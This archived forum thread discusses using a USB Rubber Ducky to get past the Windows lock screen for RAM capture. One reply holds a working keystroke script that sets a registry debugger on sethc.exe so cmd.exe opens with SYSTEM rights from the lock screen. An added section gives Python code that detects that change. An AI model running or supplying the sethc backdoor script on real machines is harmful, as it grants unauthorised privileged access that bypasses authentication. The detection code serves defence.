Archived

This topic is now archived and is closed to further replies.

Bits&Bytes

[Question] Rubber Ducky and the Windows Lock Screen

I recently purchased the Rubber Ducky (thanks HAK5, awesome tools thus far). I bought it because I thought I could bypass the lock screen by injecting my payload (let's say the utilman exploit for ease of use) from the outside, looking at a Windows lock screen. I routinely find myself in need of capturing a computer's RAM (passwords through rainbow tables... malware discovery... you name it) and cannot if the lock screen is on. For those of you out there who are going to jump on this, yes, I could do it through DMA and FireWire (IF THEY HAVE FIREWIRE, and then I would only get 4 GB of the RAM by DMA design), but I want all the RAM, not just what DMA is willing to provide.

Basically, I wrote a bat file to conduct the utilman exploit, then encoded it into base64 and placed it in the inject.bin file with a vbs to revert the base64 file back into the .bat file. Then the inject.bin file would execute the .bat file. This works awesome when I plug it in with no lock screen on; however, when the lock screen is activated, it never gets to open the command prompt to conduct the injection. HELP HELP HELP

I thought because the Rubber Ducky would be seen as a HID device it would bypass the lock screen in Windows and inject my code. Am I wrong, or is this not a capability of the tool?


I do not own a ducky... So, this is to be taken with a grain of salt; but I think if you threw it in at boot... it may take hold.


Actually, I need the RAM from the running machine, so if I reboot it will preclude the need for the RAM as it will all be cleared in the reboot, but I do thank you for the response.


USB does not support DMA (Direct Memory Access).

FireWire does have the handy module SBP2, which enables full DMA.

You could probably exploit MS13-027, but you would have to program your own payload.


If you have done my system privileges cmd attack while the machine was unlocked, then when it was locked you would have access to a command prompt with system access, and I'm sure you could do something from there.

DELAY 400
ESCAPE
DELAY 200
CONTROL ESCAPE
DELAY 750
STRING cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f"
DELAY 750
CTRL-SHIFT ENTER
DELAY 1000
ALT y
Left Alt + Left Shift + Print Screen to access the prompt.

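A defender's view of the registry change in the script above, as an added example that is not part of the original thread: a Python check that flags process-creation command lines which set an Image File Execution Options `Debugger` value on a binary Windows can start from the lock screen. The binary list, the function names and the sample command lines are assumptions constructed for illustration.

```python
import re

# Assumed watch list: accessibility helpers Windows can launch before sign-in.
LOCK_SCREEN_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
    "narrator.exe", "displayswitch.exe", "atbroker.exe",
}

REG_ADD = re.compile(r'\breg(?:\.exe)?"?\s+add\b', re.IGNORECASE)
IFEO_KEY = re.compile(
    r'\\Image File Execution Options\\(?P<image>[^\\"\s]+)', re.IGNORECASE)
DEBUGGER_VALUE = re.compile(r'/v\s+"?Debugger"?(?=\s|$)', re.IGNORECASE)
DATA_ARG = re.compile(r'/d\s+(?:"(?P<q>[^"]*)"|(?P<b>\S+))', re.IGNORECASE)


def find_ifeo_hijack(command_line):
    """Return (image, debugger) when the command line sets an IFEO Debugger
    on a lock-screen binary, otherwise None."""
    if not REG_ADD.search(command_line):
        return None  # reads such as "reg query" are not a modification
    key = IFEO_KEY.search(command_line)
    if not key or not DEBUGGER_VALUE.search(command_line):
        return None
    image = key.group("image").lower()
    if image not in LOCK_SCREEN_BINARIES:
        return None
    data = DATA_ARG.search(command_line)
    debugger = (data.group("q") or data.group("b") or "") if data else ""
    return image, debugger


def scan(command_lines):
    """Return (index, image, debugger) for every flagged command line."""
    hits = []
    for index, line in enumerate(command_lines):
        hit = find_ifeo_hijack(line)
        if hit:
            hits.append((index, *hit))
    return hits


# Constructed samples; the first is the command typed by the script above.
SAMPLE_COMMAND_LINES = [
    r'cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f"',
    r'reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d C:\Windows\System32\cmd.exe /f',
    r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"',
    r'reg add "HKLM\SOFTWARE\Contoso\Agent" /v Debugger /t REG_DWORD /d 0 /f',
]

if __name__ == "__main__":
    for index, image, debugger in scan(SAMPLE_COMMAND_LINES):
        print(f"line {index}: IFEO Debugger set on {image} -> {debugger}")
```

The same match can be applied to the command-line field of process-creation audit events; a registry-value audit on the Image File Execution Options key also covers changes made without `reg.exe`.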

The Rubber Ducky is just a programmable keyboard device. Anything that you can't do with a keyboard, you can't do with a Rubber Ducky. So, in order to use the utility manager payload, you need to be at a desktop - not a lock screen or a logon prompt.
